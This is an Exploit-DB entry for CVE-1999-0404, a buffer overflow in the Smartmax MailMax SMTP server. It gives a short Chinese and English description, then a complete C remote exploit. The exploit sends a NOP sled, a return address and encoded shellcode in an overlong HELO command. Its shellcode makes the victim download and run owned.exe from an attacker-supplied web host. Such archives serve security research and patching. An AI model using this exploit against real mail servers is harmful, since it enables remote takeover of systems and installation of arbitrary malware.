https://www.exploit-db.com/exploits/20600
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199902-026

SmartmaxMailMax是一个Windows95/98/NT环境下的SMTP服务器。处理SMTP命令的进程函数存在缓冲区溢出漏洞。远程攻击者可以利用该漏洞以SMTP服务进程的权限执行任意指令。

source: http://www.securityfocus.com/bid/2312/info

Smartmax MailMax is an email server for Windows 95/98/NT. It is vulnerable to buffer overflow attacks against the SMTP-command processing function. This can be exploited to execute arbitrary commands with the privileges of the SMTP process. 

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>

/* Mail-Max Remote Exploit by _mcp_ <[email protected]>
This program must be run under x86 Linux

Greets go out to: Morpheus, Killspree, Coolg, Dregvant, Vio,
Wrl, #finite, #win32asm and anyone I may have missed, you know
who you are :).

You can reach me on efnet.

No greets go out to etl.

*/

char code[] =
"xEBx45xEBx20x5BxFCx33xC9xB1x82x8BxF3x80x2Bx1"
"x43xE2xFAx8BxFBxE8xE9xFFxFFxFFxE8xE4xFFxFFxFF"
"xEBx29x46x58xFFxE0xBBx40xA5x1x10x56xFFx13x8B"
"xE8x46x33xC0x3Ax6x75xF9x46x40x3Ax6x74xE5x56"
"x55xBBx54xA5x1x10xFFx13xABxEBxE7xEBx4Fx33xC9"
"x66x49xC1xC1x2x51x33xC0x51x50xFFx57xE8x8BxE8"
"x33xC9x51x51x51x51x57xFFx57xF4x33xC9x51x51x51"
"x51x56x50xFFx57xF8x59x57x51x55x50xFFx57xFCx83"
"xC6x7x33xC9x51x56xFFx57xDCxFFx37x55x50x8BxE8"
"xFFx57xE0x55xFFx57xE4x33xC9x51x56xFFx57xECxFF"
"x57xF0xE8x67xFFxFFxFFx4Cx46x53x4Fx46x4Dx34x33"
"x1x60x6Dx64x73x66x62x75x1x60x6Dx78x73x6Ax75"
"x66x1x60x6Dx64x6Dx70x74x66x1x48x6Dx70x63x62"
"x6Dx42x6Dx6Dx70x64x1x58x6Ax6Fx46x79x66x64x1"
"x46x79x6Ax75x51x73x70x64x66x74x74x1x2x58x4A"
"x4Fx4Ax4Fx46x55x1x4Ax6Fx75x66x73x6Fx66x75x50"
"x71x66x6Fx42x1x4Ax6Fx75x66x73x6Fx66x75x50x71"
"x66x6Fx56x73x6Dx42x1x4Ax6Fx75x66x73x6Fx66x75"
"x53x66x62x65x47x6Ax6Dx66x1x2x69x75x75x71x3B"
"x30x30x00";

    /*This is the encrypted /~pw/owned.exe we paste at the end */
char dir[] = "x30x7fx71x78x30x70x78x6fx66x65x2Fx66x79x66x1x0";


unsigned int getip(char *hostname)
  {
  struct hostent *hostinfo;
  unsigned int binip;

  hostinfo = gethostbyname(hostname);

  if(!hostinfo)
    {
      printf("cant find: %sn",hostname);
      exit(0);
    }
  bcopy(hostinfo -> h_addr, (char  *)&binip, hostinfo -> h_length);
  return(binip);
  }


int usages(char *fname)
{						
      printf("Remote Mail-Max exploit v1.0 by _mcp_ <[email protected]>.n");
      printf("Usages: n");
      printf("%s <target host> <http site> <offset> <return address>n",
fname);
      printf("All known versions offset = 539, Return address = 79887315n");
      printf("Will make target download, save, and execute http://<http site>/~pw/owned.exen");

exit(0);

}


main (int argc, char *argv[])
{
  int sock,filedesc,offset,targethost,sinlen,codelength;
  struct sockaddr_in sin;
  unsigned char buffer[8000];
  char ipbuffer[16];
  unsigned char *ptr,*ptr2;
  unsigned long ret_addr;
  int len,x = 1;
  unsigned long address;

  if (argc < 5) usages(argv[0]);

  targethost = getip(argv[1]);


   len = strlen(argv[2]);
    if (len > 60)
     {
       printf("Bad http format!n");
       usages(argv[0]);
     }

   ptr = argv[2];
   while (x <= len)
      {
        x++;
        (*ptr)++;           /*Encrypt the http ip for later parsing */
        ptr++;
      }

  offset = atoi(argv[3]);
  ret_addr = atol(argv[4]);

  if (offset > 7000)
     {

       printf("Offset too large.n");
       exit(0);
     }

  sock = socket(AF_INET,SOCK_STREAM,0);

  sin.sin_family = AF_INET;
  sin.sin_addr.s_addr = targethost;
  sin.sin_port = htons(25);
  sinlen = sizeof(sin);


  printf("Starting to create the eggn");
  ptr = (char *)&buffer;
  strcpy(ptr,"HELO ");
  ptr+=5;

  memset((void *)ptr, 0x90, 7000);

  ptr+=offset;
  memcpy ((void *) ptr,(void *)&ret_addr, 4);
  ptr+=60;
  memcpy((void *) ptr,(void *)&code,strlen(code));


  (char *) ptr2 = strstr(ptr,"xb1");
  if (ptr2 == NULL)
     {
       printf("Bad shell coden");
       exit(0);
     }
  ptr2++;
  (*ptr2)+= len + ( sizeof(dir) - 1 );

   (char *) ptr2 = strstr(ptr,"x83xc6");
     if (ptr2 == NULL)
      {
        printf("Bad shell coden");
        exit(0);

      }

  ptr2+= 2;

  (*ptr2)+= len + 8;

  ptr+=strlen(code);
  memcpy((void *) ptr, (void *) argv[2], len);   /*Parse in the http
  site's info */
  ptr+=len;
  memcpy((void *) ptr,(void*) &dir, sizeof(dir) );
  printf("Made the eggn");

    if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1)
     {
       perror("error:");
       exit(0);
     }
    printf("Connected.n");

    write(sock, &buffer, strlen((char *)&buffer) );
    write(sock,"rn",2);
    sleep(1);
    printf("Sent the eggn");
   close(sock);
   exit(1);
}

VulnerablesoftwareandversionsConfiguration1OR*cpe:/a:smartmax_software:mailmax*DenotesVulnerableSoftware*ChangesrelatedtovulnerabilityconfigurationsTechnicalDetailsVulnerabilityType(ViewAll)CVEStandardVulnerabilityEntry:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0404